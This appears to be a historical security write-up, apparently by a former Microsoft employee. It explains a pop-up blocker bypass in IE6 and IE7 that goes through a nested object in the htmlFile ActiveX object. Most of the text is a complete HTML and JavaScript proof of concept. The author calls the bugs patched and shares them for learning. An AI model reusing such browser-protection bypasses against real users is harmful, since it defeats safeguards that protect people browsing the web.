Full Popup Bypass Using htmlFile Control IE6 and IE7

After some persistence I found a way to open an unrestricted pop-up window on both IE6 and IE7 using the htmlFile ActiveX object. The trick is to store the ActiveX reference outside an IFRAME, kill the IFRAME, write an OBJECT TYPE="text/html" inside the “dead” ActiveX, and then call window.open from that nested object’s parent window.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<TITLE>Another popUp Blocker byPass. Works on IE7 and IE6 Fully Patched</TITLE></HEAD>
<BODY>
<FONT SIZE="2" FACE="Verdana">
<B>Another popUp Blocker byPass. Works on IE7 and IE6 Fully Patched.</B><BR><BR>

1) Create an ActiveXObject("htmlFile") inside an IFRAME (ifr).<BR><BR>

2) Save a pointer (actX) to the ActiveX <U>outside the IFRAME</U>.<BR><BR>

3) Change the URL of the IFRAME killing (in theory) the ActiveXObject.<BR><BR>

4) Write an OBJECT TYPE="text/html"(popByPass) inside the "dead" ActiveX.<BR><BR>

5) Use the window.open function of the text/html OBJECT.<BR><BR>

6) Enjoy the Window! :|<BR><BR>
<FONT SIZE="1">Note: if we open the window straight from the ActiveX (without doing point 4), it will not work on IE7 but yes,
it will still work fine on IE6.</FONT>

</FONT>
<IFRAME NAME="ifr" STYLE="display:none;"></IFRAME>
<SCRIPT LANGUAGE="JavaScript">
ifr.execScript('parent.actX=new ActiveXObject("htmlFile");')
ifr.location.replace('about:blank');
function writeIt(){
	actX.write('<OBJECT ID="popByPass" WIDTH=10 HEIGHT=10 DATA="favicon.ico" TYPE="text/html"></OBJECT>');
	actX.close();
	setTimeout('openIt()',1000);
}
function openIt(){
	actX.all.popByPass.object.parentWindow.open("http://www.altavista.com","_blank","width=300,height=300,toolbar=no");
//	If we change this line and open the Window straight from the ActiveX, it WILL NOT work on IE7.
//	actX.parentWindow.open("http://www.altavista.com","_blank","width=300,height=300,toolbar=no");
}
setTimeout('writeIt()',1000);
</SCRIPT>
</BODY>
</HTML>

The key is using a nested OBJECT TYPE="text/html" inside the dead ActiveX rather than calling open() on the ActiveX itself. The extra layer of indirection through the object’s parentWindow gave the call a different trust level that bypassed IE7’s pop-up blocker, while the direct ActiveX call still worked in IE6.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.